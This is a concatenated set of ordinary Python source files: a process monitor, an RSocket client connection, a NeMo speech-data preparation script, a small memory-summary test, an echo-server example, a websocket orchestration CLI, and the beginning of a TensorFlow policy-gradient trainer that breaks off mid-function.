    logging.basicConfig(level=log_level,
                        format='%(asctime)s - %(name)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    logger = logging.getLogger(logger_name)
    # Dead code removed: a StreamHandler/Formatter pair was built here but
    # never attached (the addHandler call was commented out), so console
    # output always came from basicConfig's root handler anyway.
    # file_handler = logging.FileHandler(log_file_location, mode='w')
    # file_handler.setLevel(logging.INFO)
    # logger.addHandler(file_handler)
    logger.info("Logger was set")
    return logger
def clean_logger_handlers(logger):
    """Detach every handler attached to *logger*.

    Iterates over a copy of logger.handlers: the previous implementation
    removed handlers while iterating the live list, which skips every
    other handler and leaves some attached.
    """
    for handler in list(logger.handlers):
        logger.removeHandler(handler)
def print_usage():
    """Print command-line usage information to stdout."""
    prog = sys.argv[0]
    # The previous version called .format(...) on a string with no
    # placeholder (a no-op) and leaked literal "\n \" escapes into the
    # output of the description line.
    print("Monitors searches for processes with names containing a "
          "given string and monitors those processes statistics continuously")
    print("Usage:")
    print("\t{} -h - Displays this help message".format(prog))
    print("\t{} process_string [poll_time_in_seconds(default=5)] - Start monitoring data".format(prog))
    print("\t{} -e - Exports data from database to csv files".format(prog))
def main():
    """
    Main function:
    Checks arguments and dispatches on argv:
    "-h" prints usage, "-e" exports the database to csv files, otherwise
    argv[1] is a process-name substring to monitor and argv[2]
    (optional) is the poll interval in seconds.
    """
    numargs = len(sys.argv)
    if HELP_ARGS_NUMBER == numargs and "-h" == sys.argv[1]:
        print_usage()
    elif EXPORT_ARGS_NUMBER == numargs and "-e" == sys.argv[1]:
        logger = set_logging(LOGGER_NAME)
        try:
            data_exporter = DataExporter(DATABASE_LOCATION)
            data_exporter.export()
        except Exception as exception_object:
            # NOTE(review): re-raised unchanged; the except exists only to
            # make the cleanup path explicit — finally would run anyway.
            raise exception_object
        finally:
            clean_logger_handlers(logger)
    elif numargs >= MIN_ARGS_COUNT and numargs <= MAX_ARGS_COUNT:
        process_string = sys.argv[1]
        poll_time = DEFAULT_POLL_TIME
        try:
            poll_time = float(sys.argv[2])
        except ValueError:
            print("Value for polling is not a number")
            print_usage()
            return
        except IndexError:
            # argv[2] is optional: keep DEFAULT_POLL_TIME.
            pass
        logger = set_logging(LOGGER_NAME)
        database_manager = DatabaseManager(DATABASE_LOCATION)
        monitor = ProcessesMonitor(process_string, database_manager, poll_time)
        monitor.start()
        try:
            monitor.loop()
            logger.info("ProcessesMonitor has stopped working")
            monitor.stop()
            logger.info("Quitting ProcessesMonitor")
        except KeyboardInterrupt:
            logger.info("Quitting ProcessesMonitor")
            monitor.stop()
        finally:
            # NOTE(review): stop() also runs in the try/except paths above,
            # so it may execute twice — confirm repeated stop() is safe.
            monitor.stop()
            monitor.clean()
            database_manager.clean()
            logger.debug("Main about to exit thread id:%s", threading.get_ident())
            clean_logger_handlers(logger)
    else:
        print_usage()
# Script entry point.
if __name__ == "__main__":
    main()
|
client_connection.py | from .abstract_connection import AbstractConnection
from ..transport import AbstractTransport
from ..frames import SetupFrame, Frame_ABC, ErrorFrame, ErrorCodes
from ..common import RSocketConfig
from .keepalive_support import KeepaliveSupport
import threading
import rx
import rx.subject
from queue import PriorityQueue
import logging
class PriorityEntry(object):
    """Orderable wrapper pairing a payload with a numeric priority.

    Lets arbitrary (non-comparable) payloads live in a PriorityQueue:
    only ``priority`` participates in ordering, ``data`` is opaque.
    """

    def __init__(self, priority, data):
        # Lower numbers sort first, i.e. are dequeued earlier.
        self.priority = priority
        self.data = data

    def __lt__(self, other):
        """Order entries strictly by their priority value."""
        return self.priority < other.priority
class ClientConnection(AbstractConnection):
    """Client side of an RSocket connection.

    Owns a daemon send thread draining a priority queue and a daemon
    receive thread publishing incoming frames on an rx Subject.
    """

    def __init__(self, transport: AbstractTransport, config: RSocketConfig):
        super().__init__()
        self._log = logging.getLogger("rsockets2.connection.ClientConnection")
        self._transport = transport
        self._config = config
        self._keepalive_support: KeepaliveSupport = None
        self._send_thread = threading.Thread(
            name="RSocket-Client-Send-Thread", daemon=True, target=self._send_loop)
        self._recv_thread = threading.Thread(
            name="RSocket-Client-Recv-Thread", daemon=True, target=self._recv_loop)
        self._running = False
        self._send_queue = PriorityQueue()
        self._recv_subject = rx.subject.Subject()

    def open(self):
        """Connect the transport, start receiving, negotiate, start sending.

        The receive thread starts before negotiation so handshake
        responses can be consumed while the SETUP frame is in flight.
        """
        self._running = True
        self._transport.connect()
        self._recv_thread.start()
        self._negotiate_connection()
        self._send_thread.start()

    def _negotiate_connection(self):
        # Send the SETUP frame derived from config, then start keepalives.
        setup_frame = SetupFrame.from_config(self._config)
        self._transport.send_frame(setup_frame)
        self._keepalive_support = KeepaliveSupport(self, self._config)
        self._keepalive_support.start()

    def queue_frame(self, frame: Frame_ABC):
        """Queue a frame for sending.

        Connection-level frames (stream id 0) get a lower priority number
        and are therefore dequeued before per-stream frames.
        """
        priority = 10 if frame.stream_id == 0 else 100
        self._send_queue.put(PriorityEntry(priority, frame))

    def recv_observable(self):
        """Observable emitting every frame received from the transport."""
        return self._recv_subject

    def destroy_observable(self):
        # NOTE(review): _destroy_publisher is not created in this class;
        # presumably it is provided by AbstractConnection — verify.
        return self._destroy_publisher

    def close(self):
        """Stop the loops, keepalives and the transport."""
        self._running = False
        # Fixed: identity comparison with None ("is not") instead of "!=".
        if self._keepalive_support is not None:
            self._keepalive_support.stop()
        self._destroy_publisher.on_completed()
        self._transport.disconnect()

    def _send_loop(self):
        """Drain the send queue onto the transport until closed."""
        try:
            while self._running:
                try:
                    data = self._send_queue.get().data
                    self.increase_send_position(len(data))
                    self._transport.send_frame(data)
                except Exception as error:
                    if self._running:
                        raise error
                    else:
                        # Socket already closed on purpose: swallow quietly.
                        self._log.debug(
                            "Silent socket error because its already closed.", exc_info=True)
        except Exception as err:
            # NOTE(review): debug-level while still running vs error-level
            # after close looks inverted — confirm intended log levels.
            if self._running:
                self.close()
                self._log.debug(
                    "Error in send_loop: {}".format(err), exc_info=True)
            else:
                self._log.error(
                    "Error in send_loop: {}".format(err), exc_info=True)

    def _recv_loop(self):
        """Read frames from the transport and publish them until closed."""
        try:
            while self._running:
                try:
                    frame = self._transport.recv_frame()
                    self.increase_recv_position(len(frame))
                    self._recv_subject.on_next(frame)
                except Exception as error:
                    if self._running:
                        raise error
                    else:
                        # Socket already closed on purpose: swallow quietly.
                        self._log.debug(
                            "Silent socket error because its already closed.", exc_info=True)
        except Exception as err:
            # Propagate the failure to subscribers before tearing down.
            self._recv_subject.on_error(err)
            if self._running:
                self.close()
                self._log.debug(
                    "Error in recv_loop: {}".format(err), exc_info=True)
            else:
                self._log.error(
                    "Error in recv_loop: {}".format(err), exc_info=True)
|
prepare_data.py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import multiprocessing
import os
import re
from pathlib import Path
from typing import List
import regex
import scipy.io.wavfile as wav
from normalization_helpers import LATIN_TO_RU, RU_ABBREVIATIONS
from num2words import num2words
from nemo.collections import asr as nemo_asr
try:
from nemo_text_processing.text_normalization.normalize import Normalizer
NEMO_NORMALIZATION_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
NEMO_NORMALIZATION_AVAILABLE = False
parser = argparse.ArgumentParser(description="Prepares text and audio files for segmentation")
parser.add_argument("--in_text", type=str, default=None, help='Path to a text file or a directory with .txt files')
parser.add_argument("--output_dir", type=str, required=True, help='Path to output directory')
parser.add_argument("--audio_dir", type=str, help='Path to folder with .mp3 or .wav audio files')
parser.add_argument(
"--audio_format", type=str, default='.mp3', choices=['.mp3', '.wav'], help='Audio files format in --audio_dir'
)
parser.add_argument('--sample_rate', type=int, default=16000, help='Sampling rate used during ASR model training')
parser.add_argument(
'--language', type=str, default='eng', choices=['eng', 'ru', 'add other languages supported by num2words.']
)
parser.add_argument(
'--cut_prefix', type=int, default=0, help='Number of seconds to cut from the beginning of the audio files.',
)
parser.add_argument(
'--model', type=str, default='QuartzNet15x5Base-En', help='Pre-trained model name or path to model checkpoint'
)
parser.add_argument('--min_length', type=int, default=0, help='Min number of chars of the text segment for alignment.')
parser.add_argument(
'--max_length', type=int, default=100, help='Max number of chars of the text segment for alignment.'
)
parser.add_argument(
'--additional_split_symbols',
type=str,
default='',
help='Additional symbols to use for \
sentence split if eos sentence split resulted in sequence longer than --max_length. '
'Use "|" as a separator between symbols, for example: ";|:" ',
)
parser.add_argument(
'--use_nemo_normalization',
action='store_true',
help='Set to True to use NeMo Normalization tool to convert numbers from written to spoken format.',
)
def convert_audio(in_file: str, wav_file: str = None, sample_rate: int = 16000) -> str:
    """
    Convert .mp3 to .wav and/or change sample rate if needed

    Args:
        in_file: Path to .mp3 or .wav file
        wav_file: Optional path for the output .wav file; if None the name
            is derived from in_file as "<stem>_<sample_rate>.wav"
        sample_rate: Desired sample rate

    Returns:
        path to .wav file

    Raises:
        ValueError: if in_file does not exist
    """
    import shlex

    print(f"Converting {in_file} to .wav format with sample rate {sample_rate}")
    if not os.path.exists(in_file):
        raise ValueError(f'{in_file} not found')
    if wav_file is None:
        wav_file = in_file.replace(os.path.splitext(in_file)[-1], f"_{sample_rate}.wav")
    # Quote both paths so file names containing spaces or shell
    # metacharacters neither break nor inject into the shell command.
    os.system(
        f'ffmpeg -i {shlex.quote(in_file)} -acodec pcm_s16le -ac 1 '
        f'-af aresample=resampler=soxr -ar {sample_rate} {shlex.quote(wav_file)} -y'
    )
    return wav_file
def process_audio(in_file: str, wav_file: str = None, cut_prefix: int = 0, sample_rate: int = 16000):
    """Process audio file: .mp3 to .wav conversion and cut a few seconds from the beginning of the audio

    Args:
        in_file: path to the .mp3 or .wav file for processing
        wav_file: path to the output .wav file
        cut_prefix: number of seconds to cut from the beginning of the audio file
        sample_rate: target sampling rate
    """
    wav_audio = convert_audio(str(in_file), wav_file, sample_rate)
    if cut_prefix > 0:
        # cut a few seconds of audio from the beginning; wav.read returns
        # the file's actual sample rate, deliberately shadowing the
        # parameter so the slice length matches the data on disk
        sample_rate, signal = wav.read(wav_audio)
        # rewrite the file in place without the first cut_prefix seconds
        wav.write(wav_audio, data=signal[cut_prefix * sample_rate :], rate=sample_rate)
def split_text(
    in_file: str,
    out_file: str,
    vocabulary: List[str] = None,
    language='eng',
    remove_brackets=True,
    do_lower_case=True,
    min_length=0,
    max_length=100,
    additional_split_symbols=None,
    use_nemo_normalization=False,
):
    """
    Breaks down the in_file roughly into sentences. Each sentence will be on a separate line.
    Written form of the numbers will be converted to its spoken equivalent, OOV punctuation will be removed.

    Args:
        in_file: path to original transcript
        out_file: path to the output file
        vocabulary: ASR model vocabulary (must contain the space character)
        language: text language
        remove_brackets: Set to True if square [] and curly {} brackets should be removed from text.
            Text in square/curly brackets often contains inaudible fragments like notes or translations
        do_lower_case: flag that determines whether to apply lower case to the in_file text
        min_length: Min number of chars of the text segment for alignment. Short segments will be combined to be
            at least min_length (not recommended for multi speaker data).
        max_length: Max number of chars of the text segment for alignment
        additional_split_symbols: Additional symbols to use for sentence split if eos sentence split resulted in
            segments longer than --max_length
        use_nemo_normalization: Set to True to use NeMo normalization tool to convert numbers from written to spoken
            format. Normalization using num2words will be applied afterwards to make sure there are no numbers present
            in the text, otherwise they will be replaced with a space and that could deteriorate segmentation results.

    Raises:
        ValueError: if NeMo normalization is requested but not installed, or
            if normalization changes the number of sentences.
    """
    print(f'Splitting text in {in_file} into sentences.')
    with open(in_file, "r") as f:
        transcript = f.read()

    # remove some symbols for better split into sentences
    transcript = (
        transcript.replace("\n", " ")
        .replace("\t", " ")
        .replace("…", "...")
        .replace("\\", " ")
        .replace("--", " -- ")
        .replace(". . .", "...")
        .replace("‘", "’")
    )
    # remove extra space and collapse runs of dots into one terminator
    transcript = re.sub(r' +', ' ', transcript)
    transcript = re.sub(r'(\.+)', '. ', transcript)

    if remove_brackets:
        # text in square/curly brackets usually marks inaudible fragments
        transcript = re.sub(r'(\[.*?\])', ' ', transcript)
        transcript = re.sub(r'(\{.*?\})', ' ', transcript)

    lower_case_unicode = ''
    upper_case_unicode = ''
    if language == 'ru':
        lower_case_unicode = '\u0430-\u04FF'
        upper_case_unicode = '\u0410-\u042F'
    elif language not in ['ru', 'eng']:
        print(f'Consider using {language} unicode letters for better sentence split.')

    # remove space in the middle of the lower case abbreviation to avoid
    # splitting it into separate sentences
    matches = re.findall(r'[a-z' + lower_case_unicode + ']\.\s[a-z' + lower_case_unicode + ']\.', transcript)
    for match in matches:
        transcript = transcript.replace(match, match.replace('. ', '.'))

    # keep quoted phrases together as standalone segments
    with_quotes = re.finditer(r'“[A-Za-z ?]+.*?”', transcript)
    sentences = []
    last_idx = 0
    for m in with_quotes:
        match = m.group()
        match_idx = m.start()
        if last_idx < match_idx:
            sentences.append(transcript[last_idx:match_idx])
        sentences.append(match)
        last_idx = m.end()
    sentences.append(transcript[last_idx:])
    sentences = [s.strip() for s in sentences if s.strip()]

    # Split transcript by utterance (roughly, sentences).
    # BUGFIX: the final lookbehind alternation was missing a "|" between
    # \?” and \!”, so sentences ending in ?” or !” were never split.
    split_pattern = (
        f"(?<!\w\.\w.)(?<![A-Z{upper_case_unicode}][a-z{lower_case_unicode}]\.)"
        f"(?<![A-Z{upper_case_unicode}]\.)(?<=\.|\?|\!|\.”|\?”|\!”)\s"
    )
    new_sentences = []
    for sent in sentences:
        # the third-party "regex" module is required: the lookbehind above
        # is variable-length, which stdlib "re" does not support
        new_sentences.extend(regex.split(split_pattern, sent))
    sentences = [s.strip() for s in new_sentences if s.strip()]

    def additional_split(sentences, split_on_symbols, max_length):
        # Further split overlong sentences on user-provided delimiters.
        # BUGFIX: guard against None (the parameter's default) as well as
        # the empty string; len(None) raised TypeError before.
        if not split_on_symbols:
            return sentences

        split_on_symbols = split_on_symbols.split('|')

        def _split(sentences, delimiter, max_length):
            # split each still-too-long sentence on delimiter, keeping the
            # delimiter attached to the left-hand piece
            result = []
            for s in sentences:
                if len(s) <= max_length:
                    result.append(s)
                else:
                    split_sent = s.split(delimiter)
                    result.extend([s + delimiter for s in split_sent[:-1]] + [split_sent[-1]])
            return result

        another_sent_split = []
        for sent in sentences:
            split_sent = [sent]
            for delimiter in split_on_symbols:
                split_sent = _split(split_sent, delimiter + ' ', max_length)
            another_sent_split.extend(split_sent)

        sentences = [s.strip() for s in another_sent_split if s.strip()]
        return sentences

    sentences = additional_split(sentences, additional_split_symbols, max_length)

    # drop utterances that contain only OOV symbols.
    # BUGFIX: digits must be strings — set(s) yields characters, so the
    # previous int entries could never match; discard() instead of
    # remove() so a vocabulary without ' ' does not raise KeyError.
    vocab_no_space_with_digits = set(vocabulary + [str(i) for i in range(10)])
    vocab_no_space_with_digits.discard(' ')
    sentences = [s for s in sentences if len(vocab_no_space_with_digits.intersection(set(s))) > 0]

    if min_length > 0:
        sentences_comb = []
        sentences_comb.append(sentences[0])
        # combine short sentences with their neighbour until both sides
        # reach min_length (not recommended for multi-speaker data)
        for i in range(1, len(sentences)):
            if len(sentences_comb[-1]) < min_length or len(sentences[i]) < min_length:
                sentences_comb[-1] += ' ' + sentences[i].strip()
            else:
                sentences_comb.append(sentences[i].strip())
        sentences = sentences_comb

    sentences = [s.strip() for s in sentences if s.strip()]

    # save split text with original punctuation and case
    out_dir, out_file_name = os.path.split(out_file)
    with open(os.path.join(out_dir, out_file_name[:-4] + '_with_punct.txt'), "w") as f:
        f.write("\n".join(sentences))

    if language == 'ru':
        # substitute common abbreviations before applying lower case,
        # then replace Latin characters with Russian ones
        for k, v in RU_ABBREVIATIONS.items():
            sentences = [s.replace(k, v) for s in sentences]
        for k, v in LATIN_TO_RU.items():
            sentences = [s.replace(k, v) for s in sentences]

    if language == 'eng' and use_nemo_normalization:
        if not NEMO_NORMALIZATION_AVAILABLE:
            raise ValueError('NeMo normalization tool is not installed.')
        print('Using NeMo normalization tool...')
        normalizer = Normalizer(input_case='cased')
        sentences_norm = normalizer.normalize_list(sentences, verbose=False)
        if len(sentences_norm) != len(sentences):
            raise ValueError('Normalization failed, number of sentences does not match.')
        # BUGFIX: actually keep the normalized sentences; previously the
        # result was computed and then silently discarded.
        sentences = sentences_norm

    sentences = '\n'.join(sentences)

    # replace remaining written numbers with their spoken form
    try:
        p = re.compile("\d+")
        new_text = ''
        match_end = 0
        for i, m in enumerate(p.finditer(sentences)):
            match = m.group()
            match_start = m.start()
            if i == 0:
                new_text = sentences[:match_start]
            else:
                new_text += sentences[match_end:match_start]
            match_end = m.end()
            new_text += sentences[match_start:match_end].replace(match, num2words(match, lang=language))
        new_text += sentences[match_end:]
        sentences = new_text
    except NotImplementedError:
        print(
            f'{language} might be missing in "num2words" package. Add required language to the choices for the'
            f'--language argument.'
        )
        raise

    # normalize typographic punctuation to plain ASCII equivalents
    sentences = (
        sentences.replace("’", "'")
        .replace("»", '"')
        .replace("«", '"')
        .replace("\\", "")
        .replace("”", '"')
        .replace("„", '"')
        .replace("´", "'")
        .replace("-- --", "--")
        .replace("--", " -- ")
        .replace("’", "'")
        .replace('“', '"')
        .replace('“', '"')
        .replace("‘", "'")
        .replace('—', '-')
        .replace("- -", "--")
        .replace('`', "'")
        .replace(' !', '!')
        .replace(' ?', '?')
        .replace(' ,', ',')
        .replace(' .', '.')
        .replace(' ;', ';')
        .replace(' :', ':')
        .replace('!!', '!')
        .replace('--', '-')
        .replace('“', '"')
        .replace(', , ', ', ')
        .replace('=', '')
    )

    allowed_punct = [',', '.', '?', '!', ':', ';', '-', '"', '(', ')']
    # clean up normalized text and keep only allowed_punct and ASR vocabulary (lower and upper case)
    symbols_to_remove = ''.join(
        set(sentences).difference(set(vocabulary + [s.upper() for s in vocabulary] + ['\n'] + allowed_punct))
    )
    sentences_norm = sentences.translate(''.maketrans(symbols_to_remove, len(symbols_to_remove) * ' '))
    with open(os.path.join(out_dir, out_file_name[:-4] + '_with_punct_normalized.txt'), "w") as f:
        f.write(sentences_norm)

    if do_lower_case:
        sentences = sentences.lower()

    # remove all OOV symbols, then collapse the extra spaces left behind
    symbols_to_remove = ''.join(set(sentences).difference(set(vocabulary + ['\n'])))
    sentences = sentences.translate(''.maketrans(symbols_to_remove, len(symbols_to_remove) * ' '))
    sentences = re.sub(r' +', ' ', sentences)
    with open(out_file, "w") as f:
        f.write(sentences)
if __name__ == '__main__':
    args = parser.parse_args()
    os.makedirs(args.output_dir, exist_ok=True)

    text_files = []
    if args.in_text:
        # Resolve the ASR vocabulary used by split_text for OOV filtering.
        vocabulary = None
        if args.model is None:
            print(f"No model provided, vocabulary won't be used")
        elif os.path.exists(args.model):
            # --model is a path to a local checkpoint
            asr_model = nemo_asr.models.EncDecCTCModel.restore_from(args.model)
            vocabulary = asr_model.cfg.decoder.vocabulary
        elif args.model in nemo_asr.models.EncDecCTCModel.get_available_model_names():
            # --model names a downloadable pre-trained model
            asr_model = nemo_asr.models.EncDecCTCModel.from_pretrained(args.model)
            vocabulary = asr_model.cfg.decoder.vocabulary
        else:
            raise ValueError(
                f'Provide path to the pretrained checkpoint or choose from {nemo_asr.models.EncDecCTCModel.get_available_model_names()}'
            )

        # --in_text may be a single .txt file or a directory of them
        if os.path.isdir(args.in_text):
            text_files = Path(args.in_text).glob(("*.txt"))
        else:
            text_files.append(Path(args.in_text))
        for text in text_files:
            base_name = os.path.basename(text)[:-4]
            out_text_file = os.path.join(args.output_dir, base_name + '.txt')

            split_text(
                text,
                out_text_file,
                vocabulary=vocabulary,
                language=args.language,
                min_length=args.min_length,
                max_length=args.max_length,
                additional_split_symbols=args.additional_split_symbols,
                use_nemo_normalization=args.use_nemo_normalization,
            )
        print(f'Processed text saved at {args.output_dir}')

    if args.audio_dir:
        if not os.path.exists(args.audio_dir):
            raise ValueError(f'{args.audio_dir} not found. "--audio_dir" should contain .mp3 or .wav files.')

        audio_paths = list(Path(args.audio_dir).glob(f"*{args.audio_format}"))

        # Convert/trim audio files in parallel, one process per file.
        workers = []
        for i in range(len(audio_paths)):
            wav_file = os.path.join(args.output_dir, audio_paths[i].name.replace(args.audio_format, ".wav"))
            worker = multiprocessing.Process(
                target=process_audio, args=(audio_paths[i], wav_file, args.cut_prefix, args.sample_rate),
            )
            workers.append(worker)
            worker.start()
        for w in workers:
            w.join()

    print('Done.')
|
test_api.py | from pymem.api import get_summary
from multiprocessing import Process, Event
def test_get_summary():
    """Smoke-test get_summary() against a live, parked child process."""

    def sleep_until_wake(e):
        # Child simply blocks until the parent sets the event.
        e.wait()

    wake = Event()
    child = Process(target=sleep_until_wake, args=(wake,))
    child.start()
    summary = get_summary(child.pid)
    wake.set()
    child.join()

    assert len(summary) == 4
    assert set(summary.keys()) == {"private", "shared", "total", "swap"}

    def convert(value):
        # Strip the trailing unit, e.g. '1.00 MiB' -> 1.00
        return float(value[:-4])

    private, shared, total, *_ = map(convert, summary.values())
    # private + shared should account for the total, within rounding.
    assert abs(private + shared - total) <= 0.1
|
socketserver_echo_simple.py | #!/usr/bin/env python3
"""Echo server example for SocketServer
"""
#end_pymotw_header
import socketserver
class EchoRequestHandler(socketserver.BaseRequestHandler):
    """Request handler that echoes received data back to the client."""

    def handle(self):
        # Read one chunk and echo it back.  sendall() replaces send():
        # send() may transmit only part of the buffer and silently drop
        # the rest of the echo.
        data = self.request.recv(1024)
        self.request.sendall(data)
if __name__ == '__main__':
    import socket
    import threading

    # Bind to port 0 so the kernel assigns a free port.
    address = ('localhost', 0)
    server = socketserver.TCPServer(address, EchoRequestHandler)
    ip, port = server.server_address  # what port was assigned?

    t = threading.Thread(target=server.serve_forever)
    # Thread.setDaemon() is deprecated (removed path since Python 3.10);
    # assign the attribute instead so the thread doesn't block exit.
    t.daemon = True
    t.start()

    # Connect to the server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))

    # Send the data
    message = 'Hello, world'.encode()
    print('Sending : {!r}'.format(message))
    len_sent = s.send(message)

    # Receive a response
    response = s.recv(len_sent)
    print('Received: {!r}'.format(response))

    # Clean up
    server.shutdown()
    s.close()
    server.socket.close()
|
cli.py | import asyncio
import websockets
import multiprocessing
import json
import os
import shlex
from orchestration_manager import OrchestrationManager
from printer import ColorPrint
async def cli(host="localhost", port=80):
    """CLI for Orchestration Manager.

    Spawns the manager's websocket server in a child process, connects
    to it, then runs a blocking prompt loop forwarding commands.
    """

    def orchestration_manager() -> None:
        "Orchestration Manager starter"
        # Runs in the child process; constructing the manager starts it.
        OrchestrationManager(port=port)

    # Starting OrchestrationManager Websocket server process
    server_process = multiprocessing.Process(target=orchestration_manager)
    server_process.start()

    printer = ColorPrint()
    printer.loader_start()
    # Give the server process time to come up before connecting.
    await asyncio.sleep(2)
    printer.loader_stop()
    printer.info_viewer()

    # Starting CLI
    async with websockets.connect(f'ws://{host}:{port}', ping_interval=None) as websocket:

        async def send(msg: str) -> None:
            "Send a message over the websocket, swallowing close errors."
            try:
                await websocket.send(msg)
            except websockets.ConnectionClosedOK:
                print("Exception (1)")
            except Exception as e:
                print(f"Exception (2) : {e}")

        async def fetch() -> None:
            "Request pending messages from the server and display them."
            try:
                await send(json.dumps({
                    "type": OrchestrationManager.CLICommand.FETCH
                }))
                message = await websocket.recv()
                json_msg = json.loads(message)
                if json_msg["payload"]:
                    printer.message_viewer(json_msg["payload"])
            except websockets.ConnectionClosedOK:
                print("Exception (3)")
            except Exception as e:
                print(f"Exception (4) : {e}")

        # Identify this connection to the server as a CLI client.
        await send(json.dumps({
            "type": OrchestrationManager.ConnectionType.CLI
        }))

        # REPL: read a command, forward it, then poll for any response.
        while True:
            try:
                ColorPrint.print_pass("prompt", end=": ")
                command = input()
                if command:
                    args = shlex.split(command)
                    if "master" == args[0]:
                        # "master <cmd>" is an admin command to the manager
                        if len(args) > 1:
                            request = {
                                "cmd": args[1],
                                "type": OrchestrationManager.CLICommand.ADMIN
                            }
                        else:
                            ColorPrint.print_fail("Missing arg(s)")
                            continue
                    else:
                        request = {
                            "cmd": command,
                            "type": OrchestrationManager.CLICommand.COMMAND
                        }
                    await send(json.dumps(request))
                    await fetch()
            except KeyboardInterrupt:
                # Ctrl-C tears down the server process and exits.
                ColorPrint.print_fail("\n\n Terminate \n")
                server_process.terminate()
                exit(1)
if __name__ == "__main__":
    # Port comes from the PORT environment variable, defaulting to 7890.
    PORT = int(os.environ.get("PORT", 7890))
    asyncio.run(cli(port=PORT))
|
train_pg.py | import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
        input_placeholder,
        output_size,
        scope,
        n_layers=2,
        size=64,
        activation=tf.tanh,
        output_activation=None
        ):
    """Build a feed-forward MLP under the given variable scope.

    Architecture: one input dense layer plus ``n_layers`` hidden dense
    layers, all of width ``size`` with ``activation``, followed by an
    output dense layer of width ``output_size`` with
    ``output_activation``.

    Returns:
        The output tensor of the final layer.
    """
    with tf.variable_scope(scope):
        # Input projection into the hidden width.
        hidden = tf.layers.dense(
            inputs=input_placeholder,
            units=size,
            activation=activation
        )
        # Stack of hidden layers.
        for _ in range(n_layers):
            hidden = tf.layers.dense(
                inputs=hidden,
                units=size,
                activation=activation
            )
        # Final projection to the requested output size.
        return tf.layers.dense(
            inputs=hidden,
            units=output_size,
            activation=output_activation
        )
def pathlength(path):
    """Return the number of timesteps in a sampled trajectory dict."""
    rewards = path["reward"]
    return len(rewards)
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, ac_dim, 'PolicyNet_Discrete',
n_layers=n_layers, size=size)
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1])
sy_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=sy_ac_na, logits=sy_logits_na)
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, ac_dim, 'PolicyNet_Continuous',
n_layers=n_layers, size=size)
sy_logstd = tf.Variable(initial_value=tf.ones([ac_dim]),
dtype=tf.float32,
name='sample_std')
sy_sampled_ac = tf.random_normal(shape=tf.shape(sy_mean),
mean=sy_mean,
stddev=tf.exp(sy_logstd))
sy_logprob_n = - ( # NOTE: log-space, negate output!
tf.contrib.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)) \
.log_prob(sy_ac_na)
)
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
loss = tf.reduce_mean(sy_logprob_n * sy_adv_n)
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
